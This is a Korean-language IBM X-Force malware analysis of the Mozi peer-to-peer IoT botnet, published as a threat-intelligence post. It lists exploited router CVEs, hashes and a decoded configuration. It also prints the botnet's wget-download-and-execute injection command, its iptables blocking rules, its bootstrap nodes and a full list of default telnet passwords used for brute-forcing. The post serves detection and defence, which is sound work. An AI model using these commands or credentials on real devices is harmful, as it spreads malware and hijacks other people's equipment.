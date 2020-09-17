IBM X-Force는 위협 분야의 비교적 새로운 플레이어인 Mozi 봇넷이 사물인터넷 디바이스 사이에서 급증했다는 사실을 발견했습니다.
이 멀웨어는 2019년 말부터 활성화되었으며 Mirai 및 그 변종과 코드가 중복됩니다. Mozi는 2019년 10월부터 2020년 6월까지 관찰된 IoT 네트워크 트래픽의 약 90%를 차지했습니다.
이 놀라운 인수와 함께 전체 IoT 봇넷 활동이 크게 증가했는데, 이는 Mozi가 시장에서 경쟁자를 제거하지 않았음을 시사합니다. 오히려 다른 변종 봇넷의 활동을 위축시키며 시장에 활기를 불어넣었습니다. 공격이 눈에 띄게 증가하기 시작한 2019년 10월부터 2020년 6월까지 전체 IoT 공격 사례는 이전 2년간의 IoT 공격 사례를 합친 것보다 400% 더 높았습니다.
이러한 IoT 공격의 급증은 여러 가지 원인으로 인한 것일 수 있지만, 위협 행위자의 표적이 되는 IoT 환경이 계속 확장되고 있기 때문일 수도 있습니다. 전 세계적으로 약 310억 개의 IoT 디바이스가 배포되어 있으며, IoT 배포 속도는 현재 초당 127개 디바이스입니다.
공격자들은 한동안 이러한 디바이스를 활용하고 있으며, 특히 Mirai 봇넷을 통해 활용하고 있습니다. IBM X-Force 사고 대응 및 인텔리전스 서비스(IRIS) 팀은 이를 거의 4년 동안 추적해 왔습니다. 그렇다면 왜 갑자기 뛰어오른 걸까요? IBM의 연구에 따르면 Mozi는 주로 IoT 디바이스의 잘못된 구성으로 인해 발생하는 명령 삽입(CMDi) 공격을 통해 계속해서 성공을 거두고 있습니다. IoT 사용의 지속적인 증가와 잘못된 구성 프로토콜이 이러한 도약의 원인일 수 있습니다. 이러한 증가는 코로나19로 인해 기업 네트워크에 원격으로 액세스하는 빈도가 증가함에 따라 더욱 가속화되었을 수 있습니다.
IoT 봇넷은 분산 서비스 거부(DDoS) 공격을 수행하고 데이터를 훔치고 스팸을 전송하는 데 사용될 수 있습니다. 다음과 같은 다양한 유형의 IoT 디바이스를 활용할 수 있습니다.
이러한 대규모 공격 표면은 조직을 IoT 봇넷에 취약하게 합니다. 이러한 디바이스에는 기본적으로 보안 허점이 있는 경우가 많고 배포 시 보안 강화가 느슨하게 이루어지는 경우가 많습니다. IoT에서 가장 눈에 띄는 취약점은 CMDi 공격을 통해 발생합니다.
업계 뉴스레터
Think 뉴스레터를 통해 AI, 자동화, 데이터 등 가장 중요하고 흥미로운 업계 동향에 대한 최신 소식을 받아보세요. IBM 개인정보 보호정책을 참조하세요.
구독한 뉴스레터는 영어로 제공됩니다. 모든 뉴스레터에는 구독 취소 링크가 있습니다. 여기에서 구독을 관리하거나 취소할 수 있습니다. 자세한 정보는 IBM 개인정보 보호정책을 참조하세요.
IBM이 관찰한 거의 모든 IoT 공격 대상은 CMDi 공격을 사용하여 디바이스에 대한 초기 액세스 권한을 얻으려고 시도했습니다. 대상 엔드포인트가 IoT 디바이스이고 이러한 공격에 취약한 경우 페이로드가 다운로드되어 실행된 것입니다.
CMDi 공격은 여러 가지 이유로 IoT 디바이스에 대해 매우 인기가 있습니다. 첫째, IoT 임베디드 시스템에는 일반적으로 펌웨어 개발 과정에서 악용될 수 있는 웹 인터페이스와 디버깅 인터페이스가 포함되어 있습니다. 둘째, IoT 웹 인터페이스에 내장된 PHP 모듈을 악용하여 악의적인 행위자에게 원격 실행 기능을 제공할 수 있습니다. 셋째, 관리자가 예상 원격 입력을 삭제하여 인터페이스를 강화하지 못하기 때문에 IoT 인터페이스는 배포 시 취약한 상태로 남는 경우가 많습니다. 이를 통해 위협 행위자는 "wget"과 같은 셸 명령을 입력할 수 있습니다.
분석 결과 Mozi 봇넷은 “wget” 셸 명령을 사용한 다음 위협 행위자가 영향을 받는 시스템과 상호 작용할 수 있도록 권한을 변경하는 방식으로 CMDi를 활용하는 것으로 나타났습니다. 예를 들면 다음과 같습니다.
wget http://xxx.xx.xxx.xxx/bins/mozi.a -o /var/tmp/mozi.a; chmod 777 /var/tmp/mozi.a; rm -rf /var/tmp/mozi.a
호스트가 CMDi에 취약한 경우 이 명령은 "mozi.a"라는 파일을 다운로드하여 실행합니다. 이 특정 샘플에 대한 분석에 따르면 파일은 연동 파이프라인 스테이지(MIPS) 아키텍처 없이 마이크로프로세서에서 실행됩니다. 이는 많은 IoT 디바이스에서 널리 사용되는 축소된 명령 집합 컴퓨터(RISC) 아키텍처를 실행하는 시스템에서 이해할 수 있는 확장입니다. 공격자가 봇넷을 통해 디바이스에 대한 전체 액세스 권한을 얻으면 펌웨어 수준을 변경할 수 있으며 디바이스에 추가 멀웨어를 심을 수 있습니다.
이 예에서는 잘 알려진 벡터를 인용하고 있지만, 두 가지 주요 이유로 이 벡터가 계속 효과적일 수 있습니다. 첫째, 새로운 취약점으로 인해 CMDi를 통해 악용 시도가 지속적으로 업데이트될 수 있으며, 느린 패치 구현이 악용될 수 있습니다. 둘째, 이 활동은 쉽게 자동화되어 위협 행위자가 저렴한 비용으로 다양한 디바이스를 빠르게 공격할 수 있습니다.
Mozi 봇넷 인프라는 주로 중국에서 공급되는 것으로 보이며, 관찰된 인프라의 84%를 차지합니다. 이 사실은 2020년 IoT 활동에 대한 다른 오픈소스 연구와 일치합니다.
다음은 IBM이 Mozi 봇넷의 악용 시도를 관찰한 취약점 목록입니다.
|취약점
|영향을 받는 디바이스
|CVE-2017-17215
|Huawei HG532
|CVE-2018-10561 / CVE-2018-10562
|GPON 라우터
|CVE-2014-8361
|Realtek SDK를 사용하는 디바이스
|Eir D1000 Wireless Router RCI
|Eir D1000 Wireless Router
|CVE-2008-4873
|Sepal SPBOARD
|CVE-2016-6277
|Netgear R7000 / R6400
|Netgear setup.cgi unauthenticated RCE
|Netgear DGN1000
|MVPower DVR Command Execution
|MVPower DVR TV-7104HE
|CVE-2015-2051
|D-Link Devices
|D-Link UPnP SOAP Command Execution
|D-Link Devices
|CCTV-DVR Vendors RCE
|여러 CCTV-DVR 공급업체
Mozi 봇넷은 분산 슬로피 해시 테이블(DSHT) 프로토콜을 기반으로 하는 피어 투 피어(P2P) 봇넷으로, IoT 익스플로잇과 취약한 텔넷 비밀번호를 통해 확산될 수 있습니다.
실행 시 Mozi 봇넷은 로컬 UDP 포트 14737을 바인딩하려고 시도합니다. 샘플은 /proc/net/tcp 또는 /proc/net/raw를 읽고 포트 1536 및 5888을 사용하는 프로세스를 찾고 종료합니다. 샘플은 /usr/bin/python 파일이 존재하는지 확인합니다. 존재하는 경우 샘플은 프로세스 이름을 sshd로 변경합니다. 그렇지 않으면 샘플은 이를 dropbear로 변경합니다.
Mozi 봇넷에는 최소 두 가지 고유한 특성이 있는 것으로 알려져 있습니다. 무결성 검증을 위해 ECDSA384(타원 곡선 디지털 서명 알고리즘 384)를 사용합니다. 또한 Gafgyt 코드의 일부를 재사용합니다.
여기에는 P2P 네트워크에 가입하는 데 사용할 수 있는 하드코딩된 DHT 노드가 포함되어 있습니다. 이러한 노드는 다음과 같습니다.
dht[.]transmissionbt[.]com:6881 router[.]bittorrent[.]com:6881 router[.]utorrent[.]com:6881 bttracker[.]debian[.]org:6881 212[.]129[.]33[.]59:6881 82[.]221[.]103[.]244:6881 130[.]239[.]18[.]159:6881 87[.]98[.]162[.]88:6881
Mozi 봇넷에는 네 가지 주요 기능이 있습니다. DDoS 공격(HTTP, TCP, UDP), 명령 실행 공격 수행, 지정된 URL에서 악성 페이로드 다운로드 및 실행, 봇 정보 수집이 가능합니다.
아래 표에는 분석된 파일에 대한 개략적인 세부 정보가 포함되어 있습니다. 세부 정보에는 제출된 파일과 잔여 파일이 모두 포함됩니다. (잔여 파일은 멀웨어 분석 중에 정적 또는 동적으로 추출되는 파일입니다.) 데이터에는 파일 이름, 분석을 통해 결정된 파일 범주, 파일 해시 및 테이블의 다른 파일과 관련된 파일 상위 항목이 포함됩니다.
|파일 이름
|파일 카테고리
|파일 해시
|부모
|mozi.m
|봇넷
|4dde761681684d7edad4e5e1ffdb940b
|n/a
|5738f1bc69e78d234dd04e2fbfcfb4b86403fc9117b133cf1bb7cda67e7aef0a
|봇넷
|86d42d968d3d12c36722e16c78e49ffb
|mozi.m
|mozi.a
|봇넷
|9a111588a7db15b796421bd13a949cd4
|n/a
|83441d77abb6cf328e77e372dc17c607fb9c4a261722ae80d83708ae3865053d
|봇넷
|dd4b6f3216709e193ed9f06c37bcc3890
|mozi.a
실행 시 샘플은 로컬 UDP 포트 14737을 바인딩하려고 시도합니다. 샘플은 /proc/net/tcp 또는 /proc/net/raw를 읽고 포트 1536 및 5888을 사용하는 프로세스를 찾고 종료합니다. 샘플은 /usr/bin/python 파일이 존재하는지 확인합니다. 존재하는 경우 샘플은 프로세스 이름을 sshd로 변경합니다. 그렇지 않으면 샘플은 이를 dropbear로 변경합니다.
또한 이 샘플은 다른 봇넷이 SSH 및 텔넷을 사용하지 못하도록 액세스 제어 목록을 업데이트하여 SSH 및 텔넷을 차단하려고 시도합니다.
iptables -I INPUT -p tcp –destination-port 22 -j DROP iptables -I INPUT -p tcp –destination-port 23 -j DROP iptables -I INPUT -p tcp –destination-port 2323 -j DROP iptables -I OUTPUT -p tcp –source-port 22 -j DROP iptables -I OUTPUT -p tcp –source-port 23 -j DROP iptables -I OUTPUT -p tcp –source-port 2323 -j DROP
또한 iptable에서 하드코딩된 포트를 무작위로 선택합니다.
Mozi 봇넷은 맞춤형 DHT 프로토콜을 사용하여 P2P 네트워크를 개발합니다. 새 Mozi 노드가 DHT 네트워크에 가입하는 과정은 다음과 같습니다.
dht[.]transmissionbt[.]com:6881 router[.]bittorrent[.]com:6881 router[.]utorrent[.]com:6881 bttracker[.]debian[.]org:6881 212[.]129[.]33[.]59:6881 82[.]221[.]103[.]244:6881 130[.]239[.]18[.]159:6881 87[.]98[.]162[.]88:6881
샘플은 현재 노드에 대한 ID를 생성해야 합니다. Mozi에 대한 360 Netlab 보고서에 따르면 "ID는 20바이트이며 샘플에 포함된 접두사 888888 또는 구성 파일 [hp]에서 지정한 접두사와 무작위로 생성된 문자열로 구성됩니다." 구성 파일은 다음과 같습니다.
[ss]bot[/ss][hp]88888888[/hp][count]http[:]//ia[.]51[.]la/go1?id=19894027&pu=http%3a%2f%2fbaidu.com/[idp][/count]
DHT 네트워크에 참여하기 위해 샘플은 이러한 하드 코딩된 DHT 퍼블릭 노드에 핑 쿼리를 보냅니다. 노드 ID가 포함된 핑 쿼리는 아래 Wireshark의 트래픽에 표시됩니다.
두 샘플 모두 맞춤형 UPX 패커를 사용하여 포장됩니다. 이 패커는 p_info 구조에서 p_file_size와 p_blocksize의 값을 0으로 지웁니다.
샘플에는 아래와 같이 하드코딩된 구성 파일이 포함되어 있습니다.
네 가지 섹션으로 구성되어 있습니다.
구성 데이터는 하드코딩된 XOR 키인 4E665A8F80C8AC238DAC4706D54F6F7E를 사용하여 인코딩됩니다. 디코딩된 구성 데이터는 아래와 같습니다.
[ss]bot[/ss][hp]88888888[/hp][count]http[:]//ia[.]51[.]la/go1?id=19894027&pu=http%3a%2f%2fbaidu.com/[idp][/count]
구성 데이터는 다음과 같이 태그가 지정된 여러 명령을 지원합니다.
|태그(명령어)
|설명
|[ss]
|봇 역할
|[ssx]
|태그 활성화/비활성화 [ss]
|[cpu]
|CPU 아키텍처
|[cpux]
|enable/disable 태그 [cpu]
|[nd]
|새 DHT 노드
|[hp]
|DHT 노드 해시 접두사
|[공격]
|DDoS 공격 유형
|[ver]
|DHT 프로토콜의 V 섹션 값
|[sv]
|구성 업데이트
|[ud]
|업데이트 봇
|[dr]
|지정된 URL에서 페이로드 다운로드 및 실행
|[rn]
|지정된 명령 실행
|[dip]
|Mozi 봇을 다운로드하기 위한 ip:port
|[idp]
|신고 봇
|[count]
|봇을 보고하는 데 사용된 URL
Mozi 봇넷은 DDoS 공격에 Gafgyt 코드의 일부를 재사용합니다. HTTP, TCP, UDP 등 다양한 DDoS 공격 유형을 지원합니다.
구성 데이터의 해시값을 확인하기 위해 ECDSA384 서명 1이 사용됩니다. 확인하는 데 사용되는 하드코딩된 공개 키는 다음과 같습니다.
4C A6 FB CC F8 9B 12 1F 49 64 4D 2F 3C 17 D0 B8 E9 7D 24 24 F2 DD B1 47 E9 34 D2 C2 BF 07 AC 53 22 5F D8 92 FE ED 5F A3 C9 5B 6A 16 BE 84 40 77 88
XOR 키 4E665A8F80C8AC238DAC4706D54F6F7E로 인코딩됩니다. 디코딩된 공개 키는 다음과 같습니다.
02 c0 a1 43 78 53 be 3c c4 c8 0a 29 e9 58 bf c6 a7 1b 7e ab 72 15 1d 64 64 98 95 c4 6a 48 c3 2d 6c 39 82 1d 7e 25 f3 80 44 f7 2d 10 6b cb 2f 09 c6
구성 버전에 따라 봇을 업데이트할 시기가 결정됩니다. 이 값이 현재 값보다 크면 봇을 업데이트합니다. ECDSA384 시그니처 2는 구성 파일의 처음 세 부분을 확인하는 데 사용됩니다. 확인하는 데 사용되는 하드코딩된 공개 키는 다음과 같습니다.
4C B3 8F 68 C1 26 70 EB 9D C1 68 4E D8 4B 7D 5F 69 5F 9D CA 8D E2 7D 63 FF AD 96 8D 18 8B 79 1B 38 31 9B 12 69 73 A9 2E B6 63 29 76 AC 2F 9E 94 A1
XOR 키 4E665A8F80C8AC238DAC4706D54F6F7E로 인코딩됩니다. 디코딩된 공개 키는 다음과 같습니다.
02 d5 d5 e7 41 ee dc c8 10 6d 2f 48 0d 04 12 21 27 39 c7 45 0d 2a d1 40 72 01 d1 8b cd c4 16 65 76 57 c1 9d e9 bb 05 0d 3b cf 6e 70 79 60 f1 ea ef
Mozi 봇넷은 피해자 디바이스에 액세스하기 위해 악용하는 취약점 외에도 하드코딩된 자격 증명 목록을 사용하여 텔넷 자격 증명을 무차별 대입할 수 있습니다.
root admin CUAdmin default rapport super telnetadmin !!Huawei keomeo support CMCCAdmin e8telnet e8ehome1 e8ehome user mother Administrator service supervisor guest admin1 administrator 666666 888888 ubnt tech xc3511 vizxv Pon521 e2008jl r@p8p0r+ GM8182 gpon Zte521 hg2x0 epicrouter conexant xJ4pCYeW v2mprt PhrQjGzk h@32LuyD gw1admin adminpass xmhdipc juantech @HuaweiHgw adminHW 2010vesta 2011vesta plumeria0077 cat1029 123456 54321 hi3518 password 12345 fucker pass admin1234 1111 smcadmin 1234 klv123 klv1234 zte jvbzd anko zlxx 7ujMko0vizxv 7ujMko0admin system ikwb dreambox realtek 00000000 1111111 meinsm
샘플에서 사용된 텔넷 로그인 무차별 대입 공격은 다음과 같습니다.
Mozi.m 및 Mozi.a
네트워크
dht[.]transmissionbt[.]com:6881 router[.]bittorrent[.]com:6881 router[.]utorrent[.]com:6881 bttracker[.]debian[.]org:6881 212[.]129[.]33[.]59:6881 82[.]221[.]103[.]244:6881 130[.]239[.]18[.]159:6881 87[.]98[.]162[.]88:6881
주목할 문자열(압축 해제)
8.8.8.8 /proc/net/route Mozilla/4.0 (호환 가능, MSIE 8.0, Windows NT 5.2, Trident/6.0) Mozilla/4.0 (호환 가능, MSIE 10.0, Windows NT 6.1, Trident/5.0) Mozilla/4.0 (호환 가능, MSIE 8.0, Windows NT 5.1, pl) Opera 11.00 Mozilla/4.0 (호환 가능, MSIE 8.0, Windows NT 6.0, en) Opera 11.00 Mozilla/4.0 (호환 가능, MSIE 8.0, Windows NT 6.0, ja) Opera 11.00 Mozilla/4.0 (호환 가능, MSIE 8.0, Windows NT 6.1, de) Opera 11.01 Mozilla/4.0 (호환 가능, MSIE 8.0, Windows NT 6.1, fr) Opera 11.00 Mozilla/5.0 (Windows NT 6.1, WOW64) AppleWebKit/537.36(KHTML, Gecko와 유사) Chrome/50.0.2661.102 Safari/537.36 Mozilla/5.0 (Windows NT 10.0, Win64, x64) AppleWebKit/537.36(KHTML, Gecko와 유사) Chrome/51.0.2704.79 Safari/537.36 Mozilla/5.0 (Windows NT 6.1, WOW64, rv:45.0) Gecko/20100101 Firefox/45.0 Mozilla/5.0 (iPhone, CPU iPhone OS 8_4, Mac OS X와 유사) AppleWebKit/600.1.4 (KHTML, Gecko와 유사) Version/8.0 Mobile/12H143 Safari/600.1.4 Mozilla/5.0 (Windows NT 6.1, WOW64, rv:41.0) Gecko/20100101 Firefox/41.0 Mozilla/5.0 (Windows NT 6.1, WOW64) AppleWebKit/537.36(KHTML, Gecko와 유사) Chrome/45.0.2454.101 Safari/537.36 Mozilla/5.0 (Windows NT 6.1, WOW64) AppleWebKit/537.36(KHTML, Gecko와 유사) Chrome/46.0.2490.80 Safari/537.36 Mozilla/5.0 (Macintosh, Intel Mac OS X 10_11) AppleWebKit/601.1.56 (KHTML, Gecko와 유사) Version/9.0 Safari/601.1.56 Mozilla/5.0 (Macintosh, Intel Mac OS X 10_11_1) AppleWebKit/601.2.7(KHTML, Gecko와 유사) Version/9.0.1 Safari/601.2.7 Mozilla/5.0 (Windows NT 6.1, WOW64, Trident/7.0, rv:11.0) Gecko와 유사 Mozilla/4.0 (호환 가능, MSIE 6.1, Windows XP) Opera/9.80(Windows NT 5.2, U, ru) Presto/2.5.22 Version/10.51 Opera/9.80(X11, Linux i686, Ubuntu/14.10) Presto/2.12.388 Version/12.16 Mozilla/5.0 (Macintosh, Intel Mac OS X 10_9_3) AppleWebKit/537.75.14(KHTML, Gecko와 유사) Version/7.0.3 Safari/7046A194A Mozilla/5.0 (Windows NT 10.0, WOW64) AppleWebKit/537.36(KHTML, Gecko와 유사) Chrome/50.0.2661.102 Safari/537.36 Mozilla/5.0 (Windows NT 6.1, WOW64) AppleWebKit/537.36(KHTML, Gecko와 유사) Chrome/50.0.2661.94 Safari/537.36 Mozilla/5.0 (Linux, Android 4.4.3) AppleWebKit/537.36(KHTML, Gecko와 유사) Chrome/50.0.2661.89 Mobile Safari/537.36 Mozilla/5.0 (Linux, Android 4.4.3, HTC_0PCV2 Build/KTU84L) AppleWebKit/537.36(KHTML, Gecko와 유사) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36 Mozilla/4.0 (호환 가능, MSIE 8.0, X11, Linux x86_64, pl) Opera 11.00 Mozilla/4.0 (호환 가능, MSIE 9.0, Windows 98, .NET CLR 3.0.04506.30) Mozilla/4.0 (호환 가능, MSIE 9.0, Windows NT 5.1, Trident/5.0) Mozilla/4.0 (호환 가능, MSIE 9.0, Windows NT 6.0, Trident/4.0, GTB7.4, InfoPath.3, SV1, .NET CLR 3.4.53360, WOW64, en-US) Mozilla/4.0 (호환 가능, MSIE 9.0, Windows NT 6.1, Trident/4.0, FDM, MSIECrawler, Media Center PC 5.0) Mozilla/4.0 (호환 가능, MSIE 9.0, Windows NT 6.1, Trident/4.0, GTB7.4, InfoPath.2, SV1, .NET CLR 4.4.58799, WOW64, en-US) Mozilla/4.0 (호환 가능, MSIE 9.0, Windows NT 6.1, Trident/5.0, FunWebProducts) Mozilla/5.0 (Macintosh, Intel Mac OS X 10.6, rv:25.0) Gecko/20100101 Firefox/25.0 Mozilla/5.0 (Macintosh, Intel Mac OS X 10.8, rv:21.0) Gecko/20100101 Firefox/21.0 Mozilla/5.0 (Macintosh, Intel Mac OS X 10.8, rv:24.0) Gecko/20100101 Firefox/24.0 Mozilla/5.0 (Macintosh, Intel Mac OS X 10_10, rv:33.0) Gecko/20100101 Firefox/33.0 GET HEAD POST ./config /tmp/config cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL "http://127.0.0.1″>http://127.0.0.1" cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword "acsMozi" iptables -I INPUT -p tcp –destination-port 35000 -j DROP iptables -I INPUT -p tcp –destination-port 50023 -j DROP iptables -I OUTPUT -p tcp –source-port 50023 -j DROP iptables -I OUTPUT -p tcp –source-port 35000 -j DROP iptables -I INPUT -p tcp –destination-port 7547 -j DROP iptables -I OUTPUT -p tcp –source-port 7547 -j DROP [cpux] [/cpux] [cpu] [/cpu] [ssx] [/ssx] [ss] [/ss] none [sv] [/sv] [rn] [/rn] run: [nd] [/nd] /tmp /var /temp iptables -I INPUT -p udp –destination-port %d -j ACCEPT iptables -I OUTPUT -p udp –source-port %d -j ACCEPT iptables -I PREROUTING -t nat -p udp –destination-port %d -j ACCEPT iptables -I POSTROUTING -t nat -p udp –source-port %d -j ACCEPT 0.0.0.0 [idp] This node doesn’t accept announces dht.transmissionbt.com:6881 router.bittorrent.com:6881 router.utorrent.com:6881 bttracker.debian.org:6881 212.129.33.59:6881 82.221.103.244:6881 130.239.18.159:6881 87.98.162.88:6881
IoT 봇넷 환경은 계속 변화하고 있으며, IBM® Security의 데이터에 따르면 위협 행위자는 이 분야에서 활발하게 활동하고 있습니다. 조직은 Mozi와 같은 새로운 봇넷 그룹이 운영을 강화하고 전반적인 IoT 활동이 급증함에 따라 IoT 디바이스를 사용하는 조직이 진화하는 위협을 인식해야 합니다. IBM은 엔터프라이즈 IoT 디바이스가 공격자로부터 공격을 받는 것을 점점 더 많이 목격하고 있습니다. 명령 인젝션은 여전히 위협 행위자가 선택하는 주요 감염 벡터이며, 기본 디바이스 설정을 변경하고 효과적인 침투 테스트를 사용하여 방어구의 틈새를 찾아 수정하는 것이 얼마나 중요한지 다시 한번 강조합니다.
Mozi.m Metadata
|파일 이름:
|Mozi.m
|파일 크기:
|108,808
|MD5:
|4dde761681684d7edad4e5e1ffdb940b
|SHA1:
|2327be693bc11a618c380d7d3abc2382d870d48b
|SHA256:
|d546509ab6670f9ff31783ed72875dfc0f37fa2b666bd5870eecaaed2ebea4a8
|파일 유형:
|ELF 32비트 MSB 실행 파일, MIPS, MIPS-I 버전 1(SYSV), 정적으로 링크됨, 스트리핑됨
|카테고리:
|봇넷
|IRIS 이름:
|Mozi
|기타 이름:
Mozi.a 메타데이터
|파일 이름:
|Mozi.a
|파일 크기:
|95,268
|MD5:
|9a111588a7db15b796421bd13a949cd4
|SHA1:
|034c8c51a58be11ca620ce3eb0d43d5a59275d2f
|SHA256:
|e15e93db3ce3a8a22adb4b18e0e37b93f39c495e4a97008f9b1a9a42e1fac2b0
|파일 유형:
|ELF 32비트 LSB 실행 파일, ARM, 버전 1, 정적으로 링크됨, 스트리핑됨
|카테고리:
|봇넷
|IRIS 이름:
|Mozi
|기타 이름:
5738f1bc69e78d234dd04e2fbfcfb4b86403fc9117b133cf1bb7cda67e7aef0a Metadata
|파일 이름:
|d546_unpacked
|파일 크기:
|266,108
|MD5:
|86d42d968d3d12c36722e16c78e49ffb
|SHA1:
|ba733ab3bfc6b4afcf784f95aa9bee99fb665a71
|SHA256:
|5738f1bc69e78d234dd04e2fbfcfb4b86403fc9117b133cf1bb7cda67e7aef0a
|파일 유형:
|ELF 32비트 MSB 실행 파일, MIPS, MIPS-I 버전 1(SYSV), 정적으로 링크됨, 스트리핑됨
|카테고리:
|봇넷
|IRIS 이름:
|Mozi
|기타 이름:
83441d77abb6cf328e77e372dc17c607fb9c4a261722ae80d83708ae3865053d Metadata
|파일 이름:
|83441d77abb6cf328e77e372dc17c607fb9c4a261722ae80d83708ae3865053d
|파일 크기:
|212,464
|MD5:
|dd4b6f3216709e193ed9f06c37bcc389
|SHA1:
|758ba1ab22dd37f0f9d6fd09419bfef44f810345
|SHA256:
|83441d77abb6cf328e77e372dc17c607fb9c4a261722ae80d83708ae3865053d
|파일 유형:
|b'ELF 32비트 LSB 실행 파일, ARM, 버전 1, 정적으로 링크됨, 스트리핑됨'
|카테고리:
|봇넷
|IRIS 이름:
|Mozi
|기타 이름: